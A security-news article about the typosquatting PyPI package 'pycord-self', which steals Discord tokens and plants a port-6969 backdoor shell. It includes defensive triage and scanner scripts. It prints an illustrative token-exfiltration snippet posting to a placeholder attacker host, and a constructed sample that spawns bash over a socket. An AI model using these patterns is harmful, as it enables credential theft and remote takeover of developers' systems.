
🚨 Malicious PyPI Package Steals Discord Auth Tokens from Developers 🚨

Beware of Dangerous Python Package: pycord-self

By WIRE TOR - Ethical Hacking Services. Published 12 months ago. 3 min read.

A malicious package named 'pycord-self' has been discovered on the Python Package Index (PyPI) targeting Discord developers. It not only steals Discord authentication tokens but also plants a backdoor that gives the attacker remote control of the victim's system. The package mimics the widely used 'discord.py-self', which has nearly 28 million downloads. While the legitimate library offers tools for automating interactions with Discord, the malicious look-alike hides functionality that compromises developers' systems and data.

📌 Legitimate vs. Malicious Package

The legitimate 'discord.py-self' library is a popular Python tool for interacting with Discord's user API. Developers use it for:

🤖 Creating Discord bots.
⚙️ Automating moderation tasks.
🔔 Sending notifications or auto-responses.
📊 Running commands and retrieving data without requiring a bot account.

The malicious 'pycord-self' package abuses this trust by embedding harmful code while appearing to offer the same features.

🕵️ Discovery and Findings

🔍 Researchers from Socket, a code security company, discovered the malicious package, which was uploaded to PyPI in June 2024. Since then it has been downloaded 885 times. Alarmingly, the package remained available on PyPI at the time of writing, despite the publisher's verified status.

How 'pycord-self' Steals Tokens

The malicious package performs two main attacks:

1️⃣ Token Theft The package extracts the victim's Discord authentication token and sends it to an external server. A Discord token is a bearer credential that the client presents after login, so whoever holds it can act as the account without knowing the password and without ever being prompted for two-factor authentication (2FA).

📄 Example of Malicious Code (an illustration of the exfiltration pattern, as presented in this article, not the package's literal source):

```python
import os
import requests

# Read the developer's Discord token from the environment...
token = os.getenv("DISCORD_AUTH_TOKEN")
# ...and POST it to an attacker-controlled host (placeholder URL).
requests.post("http://malicious-url.com", data={"token": token})
```

2️⃣ Creating a Stealthy Backdoor In addition to token theft, the package establishes a persistent backdoor to maintain control over the victim's system. On Linux it launches a bash shell; on Windows it opens a cmd shell. The backdoor operates over port 6969 and runs in a separate thread, so the package's visible functionality is unaffected and the victim has no reason to suspect anything. This gives attackers continuous remote access to the compromised system, making it a serious security risk.
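A host-side check for the behaviour just described, added here as an example (it is not from the article or from Socket's research): parse the output of `ss -tanp` on Linux, pick out every socket whose local or peer port is the reported backdoor port, and mark the ones owned by a Python interpreter. The sample `ss` lines, the process names, PIDs and the documentation-range IP addresses are all constructed for this example.

```python
import re

BACKDOOR_PORT = 6969  # port named in the report; any port can be passed instead

# Constructed `ss -tanp` output: a normal browser connection, the described
# backdoor (Python process, remote port 6969), a Python listener on 6969, and a
# non-Python process on 6969 for comparison.  Not captured from a real host.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port   Process
ESTAB  0      0      10.0.0.5:41322      203.0.113.10:443    users:(("firefox",pid=1203,fd=88))
ESTAB  0      0      10.0.0.5:51234      198.51.100.7:6969   users:(("python3",pid=4242,fd=3))
LISTEN 0      128    0.0.0.0:6969        0.0.0.0:*           users:(("python3",pid=4242,fd=4))
ESTAB  0      0      [::1]:6969          [::1]:38740         users:(("nc",pid=5000,fd=3))
"""

_PROC = re.compile(r'"([^"]+)",pid=(\d+)')


def _split_port(addr_port):
    """Split 'host:port' (IPv4, bracketed IPv6 or '*') into (host, int-or-None)."""
    host, _, port = addr_port.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_ss(text):
    """Parse `ss -tanp` lines into dicts; the header row is skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 5 or parts[0] in ("State", "Netid"):
            continue
        state, _recvq, _sendq, local, peer = parts[:5]
        rest = parts[5] if len(parts) > 5 else ""
        laddr, lport = _split_port(local)
        raddr, rport = _split_port(peer)
        m = _PROC.search(rest)
        rows.append({
            "state": state, "laddr": laddr, "lport": lport,
            "raddr": raddr, "rport": rport,
            "proc": m.group(1) if m else None,
            "pid": int(m.group(2)) if m else None,
        })
    return rows


def find_backdoor_sockets(text, port=BACKDOOR_PORT):
    """Return every socket whose local or peer port matches, annotated with
    whether a Python interpreter owns it (the pattern described above)."""
    hits = []
    for row in parse_ss(text):
        if port not in (row["lport"], row["rport"]):
            continue
        proc = row["proc"] or ""
        hits.append({**row, "python_owned": proc.startswith("python")})
    return hits


if __name__ == "__main__":
    for h in find_backdoor_sockets(SAMPLE_SS):
        tag = "PYTHON" if h["python_owned"] else "other "
        print(f"[{tag}] {h['state']:6} {h['laddr']}:{h['lport']} -> "
              f"{h['raddr']}:{h['rport']} proc={h['proc']} pid={h['pid']}")
```

On a live machine replace `SAMPLE_SS` with the real output (for example `sys.stdin.read()` from `ss -tanp | python3 triage.py`). The port is only the indicator this report happens to name; an attacker can change it, so the stronger signal is an unexpected network socket or shell child process belonging to a Python interpreter that the developer did not start. Windows `netstat -ano` prints a different layout and needs its own parser.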

🚨 Visuals of the Malicious Operations 🖥️ Example: Token theft and backdoor mechanisms at work.

🔐 Protect Yourself Against Malicious Packages

Developers can reduce the risk of falling victim to malicious packages like 'pycord-self' by adopting secure dependency-handling practices:

1️⃣ Double-Check Package Names Typosquatting, where attackers create malicious packages with similar names to popular ones, is a common trick. Always verify the package name before installation.

2️⃣ Verify the Author Ensure the package comes from the official creator. Cross-reference details on trusted platforms like GitHub or the library’s documentation.

3️⃣ Inspect the Code Review package code for suspicious or obfuscated functions before installation. Tools like diff can help spot unexpected changes in updated packages.

4️⃣ Use Dependency Scanners Employ tools to scan for vulnerabilities or malicious code in dependencies. Scanners can flag potential risks before they compromise your project.

5️⃣ Avoid Over-Reliance on Popularity Even widely downloaded packages can be compromised. Always perform due diligence, regardless of download statistics.
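A pre-install triage script that puts items 1, 3 and 4 above into practice, added here as an example (it is not from the article, from Socket, or from either package). It normalises a package name the way PyPI does and compares it with an allow-list of names you already trust, flagging both near-typos and names that borrow a distinctive token from a known package (as 'pycord-self' borrows '-self'). It then walks the abstract syntax tree of the package source and reports the indicators this article describes: a token read from the environment, a network call to a hard-coded URL, a socket connected to a literal port, a spawned shell, and a background thread. The `KNOWN` list is an assumed allow-list, and `SAMPLE` is a constructed source that mimics the described behaviour; neither is the real package's code.

```python
import ast
import re

KNOWN = ["discord.py-self", "discord.py", "py-cord"]  # assumed allow-list


def normalize(name):
    """PEP 503 normalisation: lower-case, runs of [-_.] become a single '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a, b):
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def name_warnings(name, known=KNOWN):
    """Item 1: flag near-typos of a known name, and unknown names that reuse a
    distinctive (4+ char) token of a known one.  An exact known name is clean."""
    n, known_n = normalize(name), [normalize(k) for k in known]
    if n in known_n:
        return []
    warnings = []
    for k in known_n:
        d = levenshtein(n, k)
        if d <= 2:
            warnings.append(f"'{name}' is {d} edit(s) away from '{k}'")
        shared = {t for t in n.split("-") if len(t) >= 4} & {t for t in k.split("-") if len(t) >= 4}
        if shared:
            warnings.append(f"'{name}' shares token(s) {sorted(shared)} with '{k}'")
    return warnings


SUSPICIOUS_IMPORTS = {"socket", "subprocess", "threading", "base64"}
SHELLS = {"bash", "/bin/bash", "sh", "/bin/sh", "cmd", "cmd.exe", "powershell"}
NETWORK_CALLS = {"requests.post", "requests.get", "urllib.request.urlopen"}
SPAWN_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call", "os.system"}


def _dotted(node):
    """'a.b.c' for a Name/Attribute chain, else None (e.g. a call on a call)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join(reversed(parts + [node.id])) if isinstance(node, ast.Name) else None


def _consts(call):
    """Literal positional args, including those inside a list/tuple argument."""
    out = []
    for a in call.args:
        elts = a.elts if isinstance(a, (ast.List, ast.Tuple)) else [a]
        out += [e.value for e in elts if isinstance(e, ast.Constant)]
    return out


def triage_source(src):
    """Items 3 and 4: return sorted (lineno, reason) pairs for each indicator."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            mods = [a.name for a in node.names] if isinstance(node, ast.Import) else [node.module or ""]
            findings += [(node.lineno, f"imports {m}") for m in mods if m.split(".")[0] in SUSPICIOUS_IMPORTS]
            continue
        if not isinstance(node, ast.Call):
            continue
        fn, consts = _dotted(node.func) or "", _consts(node)
        strs = [c for c in consts if isinstance(c, str)]
        if fn in ("os.getenv", "os.environ.get") and any("TOKEN" in s.upper() for s in strs):
            findings.append((node.lineno, f"reads {strs[0]!r} from the environment"))
        if fn in NETWORK_CALLS and any(s.startswith("http") for s in strs):
            findings.append((node.lineno, f"network call to hard-coded URL {strs[0]}"))
        if fn.endswith((".connect", ".bind")) and any(isinstance(c, int) for c in consts):
            findings.append((node.lineno, f"socket endpoint with literal port {consts}"))
        if fn in SPAWN_CALLS and any(s in SHELLS for s in strs):
            findings.append((node.lineno, f"spawns a shell: {strs[0]}"))
        if fn in ("threading.Thread", "Thread"):
            findings.append((node.lineno, "starts a background thread"))
    return sorted(findings)


# Constructed source mimicking the described behaviour (not the real package).
SAMPLE = '''\
import os, socket, subprocess, threading
import requests
def _report():
    token = os.getenv("DISCORD_AUTH_TOKEN")
    requests.post("http://malicious-url.example/collect", data={"token": token})
def _shell():
    s = socket.socket()
    s.connect(("198.51.100.7", 6969))
    subprocess.Popen(["bash", "-i"])
threading.Thread(target=_shell, daemon=True).start()
_report()
'''

if __name__ == "__main__":
    for w in name_warnings("pycord-self"):
        print("name:", w)
    for lineno, reason in triage_source(SAMPLE):
        print(f"line {lineno}: {reason}")
```

Run it against a real download rather than an installed copy: `pip download --no-deps --no-binary :all: <name>`, unpack the sdist, and feed each `.py` file (including `setup.py`, which executes at install time) to `triage_source`. Note that pure edit distance does not catch 'pycord-self' at all; only the shared-token rule does, which is why the script reports both kinds of warning. Indicators such as `subprocess` or `threading` are common in legitimate code, so treat the output as a list of lines to read, not a verdict.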

💡 The Role of PyPI and the Developer Community Platforms like PyPI should enhance security by: Introducing stricter verification for publishers. Automating scans for malicious uploads. Educating users on safe package management practices. Developers, on the other hand, must actively report suspicious packages to prevent widespread damage.

📝 Key Takeaways The discovery of 'pycord-self' serves as a stark reminder of the risks involved in using open-source software. Cybercriminals exploit trust in these ecosystems, targeting unwary developers. By staying vigilant and adopting secure habits, you can protect your projects, systems, and sensitive data from falling into the wrong hands. Stay safe, stay informed, and share this article to help others secure their work!



About the Creator

WIRE TOR - Ethical Hacking Services

WIRE TOR is a Cyber Intelligence Company that Provides Pentest & Cybersecurity News About IT, Web, Mobile (iOS, Android), API, Cloud, IoT, Network, Application, System, Red teaming, Social Engineering, Wireless, And Source Code.



    © 2026 Creatd, Inc. All Rights Reserved.